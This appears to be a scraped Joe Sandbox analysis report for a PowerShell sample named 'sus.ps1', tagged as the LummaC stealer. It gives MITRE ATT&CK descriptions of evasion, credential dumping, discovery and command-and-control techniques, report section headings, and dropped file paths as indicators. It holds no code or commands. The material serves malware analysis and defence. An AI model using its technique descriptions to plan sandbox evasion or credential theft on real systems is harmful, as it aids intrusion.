Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sus.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wlnyof2.wcz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0u2mzdt.bxv.psm1

C:\Users\user\AppData\Roaming\Extra\bubs.exe

C:\Users\user\AppData\Roaming\Extra\cr.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MC7XJRVYNUSGNJTCH5GK.temp

C:\Users\user\AppData\Roaming\pkz.zip

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
sus.ps1

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre